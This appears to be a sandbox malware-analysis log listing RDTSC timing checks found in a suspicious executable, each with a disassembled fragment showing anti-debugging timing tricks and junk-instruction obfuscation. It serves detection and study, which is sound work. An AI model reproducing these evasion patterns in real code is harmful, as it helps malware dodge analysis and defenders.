Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100641A second address: 1006420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1007143 second address: 1007147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1007147 second address: 100714B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1006EE8 second address: 1006EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100714B second address: 1007189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F3B648E95F8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov di, C47Ah 0x0000002a mov edi, dword ptr [ebp+122D1C97h] 0x00000030 push 00000000h 0x00000032 clc 0x00000033 xchg eax, ebx 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1007189 second address: 100718D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100718D second address: 10071CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B648E9605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F3B648E95F8h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 jmp 00007F3B648E9606h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 10071CD second address: 10071D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1007C49 second address: 1007CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F3B648E95F8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 je 00007F3B648E95F6h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007F3B648E95F8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 0000001Ch 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 push 00000000h 0x00000046 push 00000000h 0x00000048 push esi 0x00000049 call 00007F3B648E95F8h 0x0000004e pop esi 0x0000004f mov dword ptr [esp+04h], esi 0x00000053 add dword ptr [esp+04h], 00000017h 0x0000005b inc esi 0x0000005c push esi 0x0000005d ret 0x0000005e pop esi 0x0000005f ret 0x00000060 mov esi, eax 0x00000062 xor dword ptr [ebp+122D1CC2h], eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1008741 second address: 10087C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 mov esi, dword ptr [ebp+122D194Eh] 0x0000000d mov di, cx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F3B64CCE608h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c jmp 00007F3B64CCE610h 0x00000031 push 00000000h 0x00000033 mov di, cx 0x00000036 mov di, 08C2h 0x0000003a xchg eax, ebx 0x0000003b pushad 0x0000003c jmp 00007F3B64CCE60Ah 0x00000041 pushad 0x00000042 push esi 0x00000043 pop esi 0x00000044 jmp 00007F3B64CCE60Ch 0x00000049 popad 0x0000004a popad 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jmp 00007F3B64CCE616h 0x00000054 jp 00007F3B64CCE606h 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1008F8F second address: 1008FA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B648E9601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100BEAE second address: 100BEC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE60Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100BEC6 second address: 100BECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100C52D second address: 100C531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100D584 second address: 100D5E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jne 00007F3B648E95FEh 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D307Bh], edx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F3B648E95F8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 pushad 0x00000032 movzx edi, cx 0x00000035 mov dx, 8CCFh 0x00000039 popad 0x0000003a push 00000000h 0x0000003c mov edi, 06AC8004h 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 jo 00007F3B648E95F6h 0x0000004b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100D7E7 second address: 100D7ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100D7ED second address: 100D7F2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100D7F2 second address: 100D851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F3B64CCE612h 0x0000000d nop 0x0000000e mov edi, ecx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 sub di, 2F93h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 pushad 0x00000024 mov edi, dword ptr [ebp+122D1A7Eh] 0x0000002a stc 0x0000002b popad 0x0000002c mov dword ptr [ebp+122D36C6h], esi 0x00000032 mov eax, dword ptr [ebp+122D03A5h] 0x00000038 adc edi, 1DF24BCCh 0x0000003e push FFFFFFFFh 0x00000040 add dword ptr [ebp+122D3B9Ah], ebx 0x00000046 add dword ptr [ebp+124838EEh], ebx 0x0000004c push eax 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100D851 second address: 100D855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100E688 second address: 100E68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100E68F second address: 100E699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3B648E95F6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 101068E second address: 1010693 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1010693 second address: 10106B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3B648E9602h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100F618 second address: 100F6A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 js 00007F3B64CCE61Bh 0x0000000d nop 0x0000000e jmp 00007F3B64CCE610h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov di, dx 0x0000001d sub bh, 0000002Ah 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F3B64CCE608h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 0000001Dh 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 cmc 0x00000042 mov eax, dword ptr [ebp+122D0545h] 0x00000048 jmp 00007F3B64CCE60Eh 0x0000004d push FFFFFFFFh 0x0000004f mov bx, 7DF7h 0x00000053 stc 0x00000054 nop 0x00000055 push eax 0x00000056 push edx 0x00000057 push edi 0x00000058 push ecx 0x00000059 pop ecx 0x0000005a pop edi 0x0000005b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100F6A7 second address: 100F6CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3B648E9608h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100F6CD second address: 100F6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1012D4C second address: 1012D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F3B648E95F6h 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 push ebx 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 10107E6 second address: 10107EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 10107EC second address: 10107F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 10108D7 second address: 10108F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F3B64CCE60Ah 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1013DAD second address: 1013DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1012E58 second address: 1012E61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1012E61 second address: 1012E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1012F41 second address: 1012F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1012F45 second address: 1012F4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1012F4B second address: 1012F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1012F51 second address: 1012F55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1014DCB second address: 1014DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1014ED7 second address: 1014EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1016E33 second address: 1016E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 nop 0x00000006 jne 00007F3B64CCE606h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F3B64CCE608h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007F3B64CCE608h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 mov dword ptr [ebp+122D2DC1h], edx 0x0000004a push eax 0x0000004b pushad 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 101A2F2 second address: 101A2F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 101A2F6 second address: 101A373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 add edi, 1F2973C2h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F3B64CCE608h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a pushad 0x0000002b call 00007F3B64CCE618h 0x00000030 sbb di, A681h 0x00000035 pop ebx 0x00000036 or dword ptr [ebp+122D1A30h], ecx 0x0000003c popad 0x0000003d movsx ebx, si 0x00000040 push 00000000h 0x00000042 or edi, 2C429530h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F3B64CCE618h 0x00000050 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 101A373 second address: 101A37D instructions: 0x00000000 rdtsc 0x00000002 js 00007F3B648E95FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 101B49A second address: 101B4B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B64CCE617h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 101A5E8 second address: 101A5ED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 101B6CF second address: 101B6D9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3B64CCE606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 101E5D6 second address: 101E5EA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F3B648E95FFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FC6E7F second address: FC6E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 101C817 second address: 101C89F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3B648E95F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F3B648E95F8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov edi, dword ptr [ebp+122D2B86h] 0x00000032 push dword ptr fs:[00000000h] 0x00000039 mov edi, dword ptr [ebp+1246A208h] 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 add dword ptr [ebp+1245945Bh], edi 0x0000004c mov eax, dword ptr [ebp+122D0AADh] 0x00000052 mov ebx, dword ptr [ebp+122D2C46h] 0x00000058 push FFFFFFFFh 0x0000005a mov edi, dword ptr [ebp+122D2A9Eh] 0x00000060 nop 0x00000061 push edx 0x00000062 jg 00007F3B648E95FCh 0x00000068 pop edx 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F3B648E9603h 0x00000071 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FC6E83 second address: FC6E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FC6E92 second address: FC6E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FC6E98 second address: FC6EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FC6EA3 second address: FC6EAD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3B648E95F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FC6EAD second address: FC6EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F3B64CCE606h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FC6EBC second address: FC6EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 101EBCB second address: 101EBDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3B64CCE606h 0x0000000a popad 0x0000000b jc 00007F3B64CCE60Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 101EDFF second address: 101EE30 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3B648E9603h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jmp 00007F3B648E9605h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 101EE30 second address: 101EE35 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 101EE35 second address: 101EEA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 sub ebx, 0CCD697Dh 0x0000000e push dword ptr fs:[00000000h] 0x00000015 jmp 00007F3B648E95FBh 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F3B648E95F8h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b mov ebx, dword ptr [ebp+122D2AAEh] 0x00000041 mov eax, dword ptr [ebp+122D0AE1h] 0x00000047 add dword ptr [ebp+122D32F6h], edx 0x0000004d push FFFFFFFFh 0x0000004f mov di, 656Eh 0x00000053 nop 0x00000054 push eax 0x00000055 push edx 0x00000056 ja 00007F3B648E95F8h 0x0000005c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 101EEA2 second address: 101EEC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE617h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 101EEC3 second address: 101EEC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FCBE58 second address: FCBE8C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F3B64CCE62Eh 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1028C95 second address: 1028CAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F3B648E95F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 js 00007F3B648E95F6h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 102C7D0 second address: 102C813 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE60Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edx 0x0000000e jmp 00007F3B64CCE615h 0x00000013 pop edx 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3B64CCE611h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 102C813 second address: 102C828 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3B648E95F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
